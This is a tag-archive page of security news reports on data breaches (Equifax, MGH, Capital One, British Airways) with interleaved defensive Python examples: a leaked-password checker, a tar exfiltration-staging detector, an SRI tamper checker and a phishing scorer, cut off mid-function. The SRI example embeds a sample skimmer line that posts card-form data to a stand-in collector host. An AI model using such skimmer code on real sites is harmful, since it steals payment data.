Tag Archives: breach

Assessing the value of personal data for class action lawsuits

When it comes to personal data exposed in a breach, assessing the value of that data for class action lawsuits is more of an art than a science.

As interest in protecting and controlling personal data has surged among consumers lately, there have been several research reports that discuss how much a person’s data is worth on the dark web. Threat intelligence provider Flashpoint, for example, published research last month that said access to a U.S. bank account, or “bank log,” with a $10,000 balance was worth about $25. However, the price of a package of personally identifiable information (PII) or what’s known as a “fullz” is much less, according to Flashpoint; fullz for U.S. citizens that contain data such as victims’ names, Social Security numbers and birth dates range between $4 and $10.

But that’s the value of personal data to the black market. What’s the value of personal data when it comes to class action lawsuits that seek to compensate individuals who have had their data exposed or stolen? How is the value determined? If an organization has suffered a data breach, how would it figure out how much money it might be liable for?

SearchSecurity spoke with experts in legal, infosec and privacy communities to find out more about the obstacles and approaches for assessing personal data value.

The legal perspective

John Yanchunis leads the class action department of Morgan & Morgan, a law firm based in Orlando, Fla., that has handled the plaintiff end for a number of major class action data breach lawsuits, including Equifax, Yahoo and Capital One.

The 2017 Equifax breach exposed the personal information of over 147 million people, and resulted in the credit reporting company creating a $300 million settlement fund for victims (which doesn’t even account for the hundreds of millions of dollars paid to other affected parties). Yahoo, meanwhile, was hit with numerous data breaches between 2013 and 2016. In the 2013 breach, every single customer account was affected, totaling 3 billion users. Yahoo ultimately settled a class action lawsuit from customers for $117.5 million.

When it comes to determining the value of a password, W-2 form or credit card number, Yanchunis called it “an easy question but a very complex answer.”

“Is all real estate in this country priced the same?” Yanchunis asked. “The answer’s no. It’s based on location and market conditions.”

Yanchunis said dark web markets can provide some insight into the value of personal data, but there are challenges to that approach. “In large part, law enforcement now monitors all the traffic on the dark web,” he said. “Criminals know that, so what are they doing? They’re using different methods of marketing their product. Some sell it to other criminals who are going to use it, some put it on a shelf and wait until the dust settles so to speak, while others monetize it themselves.”

As a result, several methods are used to determine the value of breached personal data for plaintiffs. “You’ll see in litigation we’ve filed, there are experts who’ve monetized it through various ways in which they can evaluate the cost of passwords and other types of data,” Yanchunis said. “But again, to say what it’s worth today or a year ago, it really depends upon a number of those conditions that need to be evaluated in the moment.”

David Berger, partner at Gibbs Law Group LLP, was also involved in the Equifax class action lawsuit and has represented plaintiffs in other data breach cases. Berger said that it was possible to assess the value of personal data, and discussed a number of damage models that have been successfully asserted in litigation to establish value.

One way is to look at the value of a piece of information to the company that was breached, he said.

“In other words, how much a company can monetize basically every kind of PII or PHI, or what they are getting in different industries and what the different revenue streams are,” Berger said. “There’s been relatively more attention paid to that in data breach lawsuits. That can be one measure of damages.”

Another approach looks at the value of an individual’s personal information to that individual. Berger explained that this can be measured in multiple different ways. In litigation, economic modeling and “fairly sophisticated economic techniques” would be employed to figure out the market value of a piece of data.

Another approach to assessing personal data value is determining the cost of what individuals need to do to protect themselves from misuse of their data, such as credit monitoring services. Berger also said the “benefit-of-the-bargain” rule can help; the legal principle dictates that a party that breaches a contract must pay the victim of the breached contract an amount in damages that puts them in the same financial position they would be in if the contract had been fulfilled.

For example, Berger said, say a consumer purchases health insurance and is promised reasonable data security, but if the insurance carrier was breached then “[they] got health insurance that did not include reasonable data security. We can use those same economic modeling techniques to figure out what’s the delta between what they paid for and what they actually received.”

Berger also said the California Consumer Privacy Act (CCPA), which he called “the strongest privacy law in the country,” will also help because it requires companies to be transparent about how they value user data.

“The regulation puts a piece on that and says, ‘OK, here are eight different ways that the company can measure the value of that information.’ And so we will probably soon have a bunch of situations where we can see how companies are measuring the value of data,” Berger said.

The CCPA goes into effect in the state on Jan. 1 and applies to organizations that do business in the state and either have annual gross revenues of more than $25 million; possess the personal information of 50,000 or more consumers, households or devices; or generate more than half their annual revenue from selling consumers’ personal information.

Security and privacy perspectives

Some security and privacy professionals are reluctant to place a dollar value on specific types of exposed or breached personal data. While some advocates have pushed the idea of treating consumers’ personal data as commodities or goods to be purchased by enterprises, others, such as the Electronic Frontier Foundation (EFF), an international digital rights group founded 29 years ago to promote and protect internet civil liberties, are against it.

An EFF spokesperson shared the following comment, part of which was previously published in a July blog post titled “Knowing the ‘Value’ of Our Data Won’t Fix Our Privacy Problems.”

“We have not discussed valuing data in the context of lawsuits, but our position on the concept of pay-for-privacy schemes is that our information should not be thought of as our property this way, to be bought and sold like a widget. Privacy is a fundamental human right. It has no price tag.”

Harlan Carvey, senior threat hunter at Digital Guardian, an endpoint security and threat intelligence vendor, agreed with Yanchunis that assessing the value of personal data depends on the circumstances of each incident.

“I don’t know that there’s any way to reach a consensus as to the value of someone’s personally identifiable data,” Carvey said via email. “There’s what the individual believes, what a security professional might believe (based on their experience), and what someone attempting to use it might believe.”

However, he said the value of data traditionally considered low-value or high-value might differ depending on the situation.

“Part of me says that on the one hand, certain classes of personal data should be treated like a misdemeanor, and others like a felony. Passwords can be changed, as can credit card numbers; SSNs cannot. Not easily,” Carvey said. “However, having been a boots-on-the-ground, crawling-through-the-trenches member of the incident response industry for a bit more than 20 years, I cringe when I hear or read about data that was thought to have been accessed during a breach. Even if the accounting is accurate, we never know what data someone already has in their possession. As such, what a breached company may believe is low-value data is, in reality, the last piece of the puzzle someone needed to completely steal my identity.”

Jeff Pollard, vice president and principal analyst at Forrester Research, said concerns about personal data privacy have expanded beyond consumers and security and privacy professionals to the very enterprises that use and monetize such data. There may be certain kinds of personal data that can be extremely valuable to an organization, but the fear of regulatory penalties and class action lawsuits is causing some enterprises to limit the data they collect in the first place.

“Companies may look at the data and say, ‘Sure, it’ll make our service better, but it’s not worth it’ and not collect it all,” Pollard said. “A lot of CISOs feel like they’ll be better off in the long run.”

Editor’s note: This is part one of a two-part series on class action data breach lawsuits. Stay tuned for part two.

Security news director, Rob Wright, contributed to this report.


Top Office 365 MFA considerations for administrators

With the rise in data breach incidents reported by companies of all sizes, it doesn’t take much effort to find a cache of leaked passwords that can be used to gain unauthorized access to email or another online service.

Administrators can require users to choose complex passwords, change them frequently and use a different password for each application or system. That makes a login harder to guess, but the practice can backfire. Many users struggle to memorize password variations, which tends to lead to one complex password reused across multiple systems. Attackers who find a password dump count on exactly that: they try each leaked password, or a variation of it, against other online services, a technique known as credential stuffing, to pry their way into systems that were never part of the original breach.
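One concrete defence against the reuse problem described above is to refuse any password that already appears in a leaked corpus, and to do so without ever sending the password itself to the lookup service. The following is an added example, not code from the original article or from any vendor it names. It implements the hash-prefix (k-anonymity) query scheme used by the Pwned Passwords range API: the client sends only the first five hex characters of the password’s SHA-1 and matches the remaining 35 characters locally. The `FAKE_RANGE_DB` contents and counts are constructed for the example; `hibp_fetch_range` is the real network call, shown but not used by default so the block runs offline.

```python
import hashlib
import urllib.request
from typing import Callable, Dict

# Constructed stand-in for the remote lookup: prefix -> "SUFFIX:COUNT" lines,
# the same line format the Pwned Passwords range API returns. Counts are made up.
FAKE_RANGE_DB: Dict[str, str] = {}


def sha1_hex(password: str) -> str:
    """Uppercase hex SHA-1, the digest form the range API is keyed on."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def _seed_fake_db() -> None:
    # Pretend these three passwords were seen in breach dumps (constructed data).
    for pw, count in (("password", 3730471), ("letmein", 238000), ("Summer2019!", 12)):
        digest = sha1_hex(pw)
        prefix, suffix = digest[:5], digest[5:]
        FAKE_RANGE_DB[prefix] = FAKE_RANGE_DB.get(prefix, "") + f"{suffix}:{count}\r\n"
    # An unrelated suffix sharing a prefix, to show that filtering happens client side.
    prefix = sha1_hex("password")[:5]
    FAKE_RANGE_DB[prefix] += "0" * 34 + "A:5\r\n"


def fake_fetch_range(prefix: str) -> str:
    """Offline lookup used by the example."""
    return FAKE_RANGE_DB.get(prefix, "")


def hibp_fetch_range(prefix: str) -> str:
    """Real lookup (network): only the 5-char prefix leaves the client, never the password."""
    req = urllib.request.Request(
        f"https://api.pwnedpasswords.com/range/{prefix}",
        headers={"User-Agent": "breach-check-example"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(password: str, fetch_range: Callable[[str], str] = fake_fetch_range) -> int:
    """Number of times `password` appears in the corpus (0 if unseen).

    k-anonymity: the server learns a 5-hex-char prefix shared by hundreds of
    hashes; matching the 35-char suffix happens here, on the client.
    """
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for line in fetch_range(prefix).splitlines():
        candidate, sep, count = line.strip().partition(":")
        if sep and candidate.upper() == suffix:
            return int(count)
    return 0


def is_acceptable(password: str, fetch_range: Callable[[str], str] = fake_fetch_range,
                  min_len: int = 12) -> bool:
    """Policy: long enough and never seen in a breach corpus."""
    return len(password) >= min_len and breach_count(password, fetch_range) == 0


_seed_fake_db()
```

To run it against the live service, pass `fetch_range=hibp_fetch_range`; the password string itself still never leaves the process, only the SHA-1 prefix does.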

IT departments in the enterprise realize that unless they implement specific password policies and enforce them, their systems may be at risk from a password-based attack. To mitigate these risks, many administrators turn to multifactor authentication (MFA) products to address some of the identity concerns. MFA adds another authentication step after users enter their password to confirm their identity, such as a biometric check or a code sent via text to their phone. An organization that has moved its collaboration workloads to Microsoft’s cloud has a few Office 365 MFA options.

When considering an MFA product, IT administrators must consider several key areas, especially when some of the services they may subscribe to, such as Microsoft Azure and Office 365, include MFA functionality from Microsoft. Depending on the level of functionality needed and services covered by MFA, IT administrators might consider selecting a third-party vendor, even when that choice will require more configuration work with Active Directory and cloud services. IT workers unfamiliar with MFA technology can look over the following areas to help with the selection process.


Choosing the right authentication options for end users

IT administrators must investigate what will work best for their end users because there are several options to choose from when it comes to MFA. Some products use phone calls for confirmation, codes via text messaging, key fobs, an authenticator app or even facial recognition. SMS and voice-call codes are the weakest of these because they can be intercepted through SIM swapping or number porting; authenticator apps or hardware tokens are preferable where users will accept them. Depending on the consensus in the organization, the IT decision-makers have to work through the evaluation process to make sure the vendor supports the option they want.

Identifying which MFA product supports cloud workloads

More organizations have adopted some cloud service, such as Office 365, Azure, AWS and other public clouds. The MFA product must adapt to the needs of the organization as it adds more cloud services. While Microsoft offers its own MFA technology that works with Office 365, other vendors such as Duo Security — owned by Cisco — and Okta support Office 365 MFA for companies that want to use a third-party product.

Potential problems that can affect Office 365 MFA users

Using Office 365 MFA helps improve security, but there is potential for trouble that blocks access for end users. This can happen when a phone used for SMS confirmation breaks or is out of the user’s possession. Users might not gain access to the system or the services they need until they recover their device or change their MFA configuration, which is why a second registered factor or a set of one-time backup codes should be issued at enrollment rather than after the lockout.

Another possible problem on the other end of the authentication process is an outage of the MFA product itself, which blocks access for everyone who has MFA enabled. IT should plan for both scenarios before implementing Office 365 MFA so that the appropriate steps can be taken if these issues arise.

Evaluate the overall costs and features related to MFA

For the most part, MFA products are subscription-based and charge a monthly fee per user. Some vendors, such as Microsoft, bundle MFA with self-service identity, access management, access reporting and self-service group management. Third-party vendors might offer different MFA features; as one example, Duo Security includes self-enrollment and management, user risk assessment with phishing simulation, and device access monitoring and identification with its MFA product.

Single sign-on, identity management and identity monitoring are all valuable features that, if included with an MFA offering, should be worth considering when it’s time to narrow the vendor list.


In light of MGH healthcare data breach, experts call for transparency

A recent healthcare data breach at Massachusetts General Hospital underscores the need for greater transparency when it comes to cybersecurity incidents.

Cybersecurity experts describe MGH’s statement on the breach as being light on details. In its announcement about the healthcare data breach, MGH stated that it is notifying nearly 10,000 individuals of a privacy incident that occurred in research programs within MGH’s department of neurology. The statement said that an unauthorized third party “had access to databases related to two computer applications used by researchers in the Department of Neurology for specific neurology research studies.”

The report provided no insight into how the breach occurred. David Holtzman, a health IT expert and an executive advisor for cybersecurity company CynergisTek Inc., said other healthcare organizations could have learned from the incident had more detail been shared.

“Healthcare organizations should consider how their experiences can benefit the larger healthcare industry through greater transparency and sharing of information if they suffer a cybersecurity incident,” he said.

A call for more transparency

MGH and its corporate parent, Partners HealthCare, have invested significantly in information security programs and cybersecurity defenses since 2011, according to Holtzman.


The effort was spurred by a settlement with the Department of Health & Human Services’ Office for Civil Rights related to a 2009 data loss incident. According to the resolution agreement, an MGH employee took home documents containing the protected health information of 192 individuals. The employee left the documents on a train when commuting to work on March 9, 2009. The documents were never recovered.

MGH paid $1 million under the resolution agreement and committed to a corrective action plan to strengthen its information security programs.

It’s MGH’s investment in cybersecurity plus its “good reputation in the healthcare community” that should spur the organization to be more transparent when a cybersecurity incident occurs so that other organizations can learn from the incident and strengthen their own programs, Holtzman said.

He believes details such as whether MGH has evidence that the healthcare data breach was the result of an outside attack as well as the mode of attack would be helpful for other healthcare organizations.

“Was it the type of attack that overwhelmed or pretended to overwhelm the security of the enterprise information system? Was it accomplished through social engineering or an email phishing attack? Or is this the work of a malicious insider,” Holtzman questioned.


Israel Barak, CISO for Boston-based cybersecurity company Cybereason Inc., said MGH sets a high standard for cybersecurity across the healthcare industry, and if it can be breached, CIOs and other healthcare leaders should pay attention.

“This should be an indication to the healthcare industry as a whole that we really need to step up our game. Because if this is what’s happening in an organization that sets the high standard, then what can we expect from organizations that look up to Massachusetts General and try to improve based on their example?” he said.

He was also struck by how long it took for MGH to discover the breach in the first place.


According to MGH’s statement, the organization discovered the breach on June 24. Yet an internal investigation revealed that the unauthorized third party “had access to databases containing research data used by certain neurology researchers” between June 10 and June 16, roughly two weeks before the breach was discovered.

Data breaches happen frequently in healthcare, but Barak said becoming aware that a breach occurred two weeks after it happened is “a standard we need to improve.”

Takeaways from MGH healthcare data breach

MGH’s statement said the affected research data could have included participants’ first and last names, some demographic information such as sex or race, date of birth, dates of study visits and tests, medical record number, type of study, research study identification numbers, diagnosis and medical history, biomarkers and genetic information, and types of assessments and results. The data didn’t include Social Security numbers, insurance or financial information and did not involve MGH’s medical records systems, according to the statement.

The MGH communications department has no further information on the healthcare data breach other than what’s contained in the statement, according to Michael Morrison, director of media relations at MGH.

CynergisTek’s Holtzman said all data that contains personally identifiable information should have “reasonable and appropriate safeguards to prevent the unauthorized use or disclosure of the information.” Any organization handling sensitive personal information should take a risk-based approach to assessing threats and vulnerabilities to enterprise information systems, he said.

“Take the results of the risk analysis and develop a plan to mitigate and identify threats and vulnerabilities to reduce the risk to sensitive information to a reasonable level,” he said.

Barak said it’s a given that healthcare security systems will get breached, “but the bigger question is, how quickly and how efficiently we can recover from something that happened. What is our cyber resiliency?”


Capital One breach suspect may have hit other companies

A new report looking into the attacker accused in the Capital One breach discovered references to other potential victims, but no corroborating evidence has been found yet.

The FBI’s criminal complaint names Paige Thompson, who allegedly went by the name “Erratic” on various online platforms, including an invite-only Slack channel. The Slack channel was first reported on by investigative cybersecurity journalist Brian Krebs, who pointed out that file names referenced in the channel pointed to other organizations potentially being victims of similar attacks.

A new report by cybersecurity firm CyberInt, based in London, regarding the Capital One breach built on the information discovered by Krebs. Jason Hill, lead cybersecurity researcher at CyberInt, said the company was able to gain access to the Slack channel via an open invitation link.

“This link was obtained from the now-offline ‘Seattle Warez Kiddies’ Meetup group (Listed as ‘Organized by Paige Thomson’),” Hill wrote via email. “Based on the publicly available information at the time of report completion, such as Capital One’s statement and the [FBI’s] Criminal Complaint, we were able to conduct open source intelligence gathering to fill in some of the missing detail and follow social media leads to gain an understanding of the alleged threat actor and their activity over the past months.”

According to Hill, CyberInt researchers followed the trail through a GitHub account, GitLab page and a screenshot of a file archival process shared in the Slack channel.

“The right-hand side of the screen appears to show the output of the Linux command ‘htop’ that lists current processes being executed. In this case, under the ‘Command’ heading, we can see a number of ‘tar --remove-files -cvf -’ processes, which are compressing data (and then removing the uncompressed source),” Hill wrote. “These files correlate with the directory listing, and potential other victims, as seen later within the Slack channel.”

Between the files named in the screenshot and the corresponding messages in the Slack channel, it appeared as though in addition to the Capital One breach, the threat actor may have stolen 485 GB of data from various other organizations. Some organizations were implied by only file names, such as Ford, but others were named directly by Erratic in messages, including the Ohio Department of Transportation, Michigan State University, Infoblox and Vodafone.
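The command line Hill describes is a recognisable staging pattern: `-cvf -` writes the archive to standard output (so it is being piped into something else, a compressor or an upload tool) and `--remove-files` deletes each source file once it has been archived, which both frees disk space on the box and destroys the originals. That combination is rare in legitimate administration and is cheap to alert on from process telemetry. The block below is an added example, not code from CyberInt’s report or from the Slack channel; the `SAMPLE_PS` listing is constructed in `ps -eo pid,user,args` form with made-up users and paths, and it goes a step beyond the quoted screenshot by also parsing GNU long options and old-style `tar cvf -` invocations.

```python
import os
import shlex
from typing import List, Optional, Tuple

# Constructed process listing (not the screenshot from the Slack channel).
SAMPLE_PS = """\
 4123 erratic  tar --remove-files -cvf - /srv/export/customer_a
 4124 erratic  tar --remove-files -cvf - /srv/export/customer_b
 4125 erratic  bash
 4126 backup   tar -czf /backup/etc-2019-08-01.tgz /etc
 4127 dev      tar cvf - ./build
 4128 erratic  tar --remove-files --file=/tmp/x.tar /srv/export/customer_c
"""

TAR_NAMES = {"tar", "gtar", "bsdtar"}


def parse_tar_argv(argv: List[str]) -> Optional[Tuple[bool, Optional[str]]]:
    """Return (remove_files, archive_target) for a tar command line, else None.

    Handles GNU long options, short clusters such as -cvf, and old-style 'tar cvf -'.
    """
    if not argv or os.path.basename(argv[0]) not in TAR_NAMES:
        return None
    remove, archive = False, None
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok == "--remove-files":
            remove = True
        elif tok.startswith("--file="):
            archive = tok.split("=", 1)[1]
        elif tok == "--file" and i + 1 < len(argv):
            archive, i = argv[i + 1], i + 1
        elif tok.startswith("--"):
            pass  # other long options carry no archive target
        elif (tok.startswith("-") and len(tok) > 1) or (i == 1 and tok.isalpha()):
            cluster = tok.lstrip("-")
            if "f" in cluster:
                rest = cluster.split("f", 1)[1]
                if rest:
                    archive = rest  # e.g. -cf-  (GNU tar takes what follows f as the file)
                elif i + 1 < len(argv):
                    archive, i = argv[i + 1], i + 1
        i += 1
    return remove, archive


def classify(argv: List[str]) -> Optional[Tuple[str, str]]:
    """Map a tar invocation to (severity, reason), or None if uninteresting."""
    parsed = parse_tar_argv(argv)
    if parsed is None:
        return None
    remove, archive = parsed
    to_stdout = archive == "-"
    if remove and to_stdout:
        return "high", "archive streamed to stdout and sources deleted (stage-and-exfiltrate pattern)"
    if remove:
        return "medium", "sources deleted after archiving"
    if to_stdout:
        return "low", "archive streamed to stdout (piped elsewhere)"
    return None


def scan_ps(listing: str) -> List[Tuple[int, str, str, str]]:
    """Run classify() over `ps -eo pid,user,args` lines -> [(pid, user, severity, reason)]."""
    findings = []
    for line in listing.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = int(parts[0]), parts[1], parts[2]
        try:
            argv = shlex.split(cmd)
        except ValueError:  # unbalanced quotes in the command line
            argv = cmd.split()
        hit = classify(argv)
        if hit:
            findings.append((pid, user, hit[0], hit[1]))
    return findings
```

In production the same `classify()` would sit on process-creation events (auditd `execve`, EDR telemetry) rather than a periodic `ps`, since a staging job can finish between two snapshots; the pipe target (`curl`, `aws s3 cp`, `nc`) is visible in those events as the sibling process and is worth joining in.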

Hill acknowledged that CyberInt did not directly contact any of the organizations named, because the company policy is normally to “contact organizations when our research detects specific vulnerabilities that can be mitigated, or threats detected by our threat intelligence platform.

“However in this case, our research was focused on the Capital One breach to gain an understanding of the threat actor’s tactics, techniques and procedures (TTP) and resulted in the potential identification of additional victims rather than the identification of any specific vulnerability or ongoing threat,” Hill wrote. “Our report offered general advice for those concerned about the TTP based on these findings.”

We contacted some of the organizations either directly named or implied via file name in Erratic’s Slack channel. The Ohio Department of Transportation did not respond to a request for comment. Ford confirmed an investigation is underway to determine if the company was the victim of a data breach.

A spokesperson for Michigan State University also confirmed an investigation is underway and the university is cooperating with law enforcement authorities, but at this point there is “no evidence to suggest MSU was compromised.”

Similarly, an Infoblox spokesperson said the company was “continuing to investigate the matter, however, at this time, there is no indication that Infoblox was in any way involved with the Capital One breach. Additionally, there is no indication of an intrusion or data breach causing Infoblox customer data to be exposed.”

A Vodafone spokesperson claimed the company takes security seriously, but added, “Vodafone is not aware of any information that relates to the Capital One security breach.”


British Airways data breach may be the work of Magecart

The British Airways data breach may have been the handiwork of the threat actor group known as Magecart.

Security researchers at the threat intelligence company RiskIQ Inc. reported that they suspect Magecart was behind the late August British Airways data breach, based on their analysis of the evidence. The Magecart group focuses on online credit card skimming attacks and is believed to be behind the Ticketmaster data breach discovered in June 2018.

British Airways reported on Sept. 6 that it had suffered a breach affecting around 380,000 customers. The company said personal and payment information from transactions made on the website and the mobile app between Aug. 21 and Sept. 5 had been compromised.

In a blog post published a week later, RiskIQ researcher Yonathan Klijnsma said that because the British Airways data breach announcement stated that the breach had affected the website and mobile app but made no mention of breaches of databases or servers, he noticed similarities between this incident and the Ticketmaster breach.

The Ticketmaster breach was caused by a web-based credit card skimming scheme that targeted e-commerce sites worldwide. The RiskIQ team said that the Ticketmaster breach was the work of the hacking group Magecart, and was likely not an isolated incident, but part of a broader campaign run by the group.

The similarities between the Ticketmaster breach and the reports of the British Airways data breach led Klijnsma and the RiskIQ team to look at Magecart’s activity.

“Because these reports only cover customer data stolen directly from payment forms, we immediately suspected one group: Magecart,” Klijnsma wrote. “The same type of attack happened recently when Ticketmaster UK reported a breach, after which RiskIQ found the entire trail of the incident.”

Klijnsma said they were able to expand the timeline of the Ticketmaster activity and discover more websites affected by online credit card skimming.

“Our first step in linking Magecart to the attack on British Airways was simply going through our Magecart detection hits,” Klijnsma explained. “Seeing instances of Magecart is so common for us that we get at least hourly alerts for websites getting compromised with their skimmer-code.”

He noted that in the instance of the British Airways data breach, the research team had no notifications of Magecart’s activity because the hacking group customized their skimmer. However, they examined British Airways’ web and mobile apps specifically and noticed the similarities — and the differences.


“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately,” Klijnsma wrote. “This particular skimmer is very much attuned to how British Airway’s (sic) payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.”

Klijnsma also said it was likely Magecart had access to the British Airways website and mobile app before the attack reportedly started.

“While we can never know how much reach the attackers had on the British Airways servers, the fact that they were able to modify a resource for the site tells us the access was substantial, and the fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets,” he wrote.
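The detail Klijnsma keeps returning to is that the attackers modified a resource the site itself served. Two controls follow directly from that: publish Subresource Integrity hashes so a browser refuses a script whose bytes no longer match, and monitor the served resources out of band against a recorded baseline so a change is noticed in hours rather than weeks. The block below is an added example, not RiskIQ’s tooling or any British Airways code. `ORIGINAL_JS` and `TAMPERED_JS` are constructed stand-ins for a checkout script before and after a skimmer is appended (the appended lines are illustrative and are not the skimmer used in the attack), and the URLs are hypothetical.

```python
import base64
import hashlib
from typing import Dict, List, Tuple

# Constructed checkout script; the "tampered" copy appends the kind of hook a
# web skimmer adds. Illustrative only, not the code used against British Airways.
ORIGINAL_JS = b"""
function submitPayment(form) {
  return fetch('/api/pay', {method: 'POST', body: new FormData(form)});
}
"""

TAMPERED_JS = ORIGINAL_JS + b"""
document.querySelector('#payment').addEventListener('submit', function (e) {
  var f = new FormData(e.target), o = {};
  f.forEach(function (v, k) { o[k] = v; });
  navigator.sendBeacon('https://collector.invalid/p', JSON.stringify(o));
});
"""


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Value for <script integrity="...">: '<algo>-' + base64(digest of the exact bytes)."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI allows sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """The tag a page carries so the browser rejects a copy whose bytes changed."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


def find_drift(baseline: Dict[str, str], observed: Dict[str, bytes]) -> List[Tuple[str, str, str]]:
    """Compare freshly fetched bodies with recorded hashes -> [(url, expected, actual)].

    A URL absent from the baseline is reported with expected == "" so that a
    newly injected resource is reviewed too, not just a modified one.
    """
    drift = []
    for url, body in observed.items():
        expected = baseline.get(url, "")
        actual = sri_hash(body)
        if expected != actual:
            drift.append((url, expected, actual))
    return drift


def demo() -> List[Tuple[str, str, str]]:
    """Baseline the original script, then observe a tampered copy and a new file."""
    url = "https://www.example.com/static/checkout.js"  # hypothetical
    baseline = {url: sri_hash(ORIGINAL_JS)}
    observed = {
        url: TAMPERED_JS,
        "https://www.example.com/static/new.js": b"console.log(1);",  # not in baseline
    }
    return find_drift(baseline, observed)
```

The caveat matters here: SRI protects a subresource only as long as the HTML that carries the `integrity` attribute is itself intact. An attacker with write access to the origin can update the hash along with the script, which is why the out-of-band comparison in `find_drift()` (run from outside the site against a baseline stored elsewhere) and a Content Security Policy restricting where forms and `sendBeacon` may post are the complementary pieces.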

Magecart, RiskIQ noted, has been active since 2015 and has been growing progressively more threatening as it customizes its skimming schemes for particular brands and companies.

In other news

  • President Donald Trump signed an executive order this week that imposes sanctions on anyone who attempts to interfere with U.S. elections. After Russian interference in the 2016 U.S. presidential election, there are fears that there will be further interference in the upcoming 2018 midterm election. In response to those fears, Trump signed an executive order that sanctions would be placed on foreign companies, organizations or individuals who have interfered with U.S. elections. The order says that government agencies must report any suspicious, malicious activity to the director of national intelligence, who will then investigate the report and determine its validity. If the director of national intelligence finds that the suspect group or individual has interfered, there will be a 45-day review and assessment period during which the Department of Justice and Homeland Security will decide whether sanctions are warranted. If they are, the foreign group or individual could have their U.S. assets frozen or be banned from the country.
  • A vulnerability in Apple’s Safari web browser enables attackers to launch phishing attacks. Security researcher Rafay Baloch discovered the vulnerability and was also able to replicate it in the Microsoft Edge browser. Baloch published the proof of concept for both browser vulnerabilities early this week, and while Microsoft had addressed the issue in its August Patch Tuesday release — citing an issue with properly parsing HTTP content as the cause — Apple has yet to issue any patches for it. The vulnerability in Safari iOS 11.3.1 could thus still be used to spoof address bars and trick users into thinking they are visiting a legitimate site that is actually malicious.
  • The hacker known as “Guccifer” will be extradited to the U.S. to serve a 52-month prison sentence. A Romanian court ruled that the hacker, who is known for exposing the misuse of Hillary Clinton’s private email server before the 2016 U.S. presidential election and whose real name is Marcel Lehel Lazar, will be extradited to America to serve his 52-month sentence after finishing his seven-year sentence in Romania — his home country. Lazar pleaded guilty in May 2016 to charges of unauthorized access to a protected computer and aggravated identity theft. Lazar is believed to have hacked into the accounts of around 100 people between 2012 and 2014, including former Secretary of State Colin Powell, CBS Sports’ Jim Nantz and Sidney Blumenthal, a former political aide to Bill Clinton and adviser to Hillary Clinton.

Missouri hospital sued over medical records breach

A hospital in Missouri faces a lawsuit after a medical records breach caused by an email phishing scam, an attack that is difficult to protect against in healthcare organizations, according to a security expert.

In January, Children’s Mercy Hospital in Kansas City, Mo., notified 63,049 individuals who were potentially affected by the medical records breach, according to Jake Jacobson, Children’s Mercy director of public relations.

An investigation led by the hospital determined that the mailboxes of four of the five affected employees had been downloaded by unauthorized individuals. According to the notification, the information accessed during the incident varied by individual, but could include medical record number, first and last name, date of birth, gender, age, height, weight, body mass index, admission and discharge dates, procedure date, diagnostic and procedure codes, demographic information, clinical information, conditions and diagnosis, and other treatment information and identifying or contact information.

Fight back with email screening tools

Security expert Larry Ponemon said a number of healthcare providers are particularly susceptible to phishing scams because cybersecurity is not their “highest priority” and they often lack a “good governance process” for controlling data access. Ponemon is the founder of Ponemon Institute, which studies data protection and information security.

“It seems like the healthcare industry, healthcare providers [are] the most vulnerable relative to the industries we study,” Ponemon said.

Within the healthcare industry there’s “not really a great technology that could identify a phishing email,” Ponemon said. He noted that implementing employee training and installing email screening tools that scour incoming emails, attachments and embedded URLs to identify potential phishing attacks could go a long way toward keeping such incidents at bay.


“A lot of phishing scams I’ve seen have not been all that difficult to see,” Ponemon said. “If you look at the information, read the link, you can guess with about 90% accuracy that basically this is not real and [is] likely to be a phishing email. But people in healthcare are under a lot of pressure, so when they get an email they don’t necessarily stop and check the terms in each email.”
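The screening Ponemon describes, as an added example that is not code from the article, from Children’s Mercy or from any vendor: a heuristic scorer that parses a raw message with Python’s standard library, compares the URL a reader sees in a link with the href it actually points to, flags raw-IP and lookalike hosts, a Reply-To that diverges from the sender, pressure wording and executable attachments. The in-house domain `childrens-example.org`, the lookalike domains, the two sample messages and the point weights are all assumptions constructed for the example.

```python
"""Heuristic phishing screen for a raw RFC 5322 message. Added example, not the
article's, the hospital's or any vendor's code; domains and samples are made up."""
import email
import email.utils
import re
from email import policy
from email.message import EmailMessage
from typing import Optional
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"childrens-example.org"}  # assumed in-house domain
RISKY_EXT = (".exe", ".js", ".vbs", ".scr", ".hta", ".docm", ".xlsm", ".iso", ".lnk")
URGENCY = ("urgent", "immediately", "verify your account", "password will expire", "suspended")
HREF_RE = re.compile(r'<a\s[^>]*href=["\']([^"\']+)["\'][^>]*>(.*?)</a>', re.I | re.S)
URL_RE = re.compile(r'https?://[^\s<>"\']+', re.I)
IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

def imitated_domain(host: str) -> Optional[str]:
    """Trusted domain that `host` resembles without being it or a subdomain of it."""
    if any(host == t or host.endswith("." + t) for t in TRUSTED_DOMAINS):
        return None
    return next((t for t in TRUSTED_DOMAINS if t.split(".")[0] in host), None)

def _domain(header) -> str:
    addr = email.utils.parseaddr(str(header))[1].lower()
    return addr.rsplit("@", 1)[1] if "@" in addr else ""

def score_message(raw: bytes) -> dict:
    """Parse `raw` and return {'score', 'verdict', 'reasons'}; weights are arbitrary."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []  # (points, reason) pairs

    def hit(points: int, why: str) -> None:
        findings.append((points, why))

    # Sender: lookalike domain, and a Reply-To that goes somewhere else.
    sender = _domain(msg.get("From", ""))
    if imitated_domain(sender):
        hit(2, f"sender domain {sender} imitates {imitated_domain(sender)}")
    reply_to = _domain(msg.get("Reply-To", ""))
    if reply_to and reply_to != sender:
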